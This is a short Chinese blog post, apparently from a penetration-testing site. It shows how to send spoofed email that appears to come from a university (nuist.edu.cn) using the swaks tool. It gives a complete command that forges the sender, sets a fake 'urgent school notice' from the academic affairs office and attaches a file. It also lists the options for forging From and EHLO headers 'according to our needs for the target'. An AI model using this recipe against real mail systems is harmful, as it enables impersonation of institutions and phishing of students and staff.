大多数学校的邮箱都可以使用代发服务(经过测试,绝大多数学校都存在这种问题)
使用方式,我们使用kali Linux中的swaks工具
目前接收邮件的测试邮箱163邮箱,qq邮箱因为安全限制问题无法接收到
具体命令:
swaks --body "学校紧急通知" --header "Subject:教务处" -t baianquanzu@163.com -f admin@nuist.edu.cn --attach post.txtbody参数是发送过去邮件的内容
header是发送过去邮件的标题
-t是我们的目标邮箱
-f是发送者的邮箱
--attach是指定要附加的文件的路径
详细参数介绍
--from <要显示的发件人邮箱>
--ehlo <伪造的邮件ehlo头>
--body <邮件正文>
--header <邮件头信息,subject为邮件标题>
--data <源邮件>
可以看到上放的发件人是学校的邮箱,标题等,根据我们对目标的需求进行伪造,只不过下方的附件会被统一变成一个网易邮箱的文件b
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...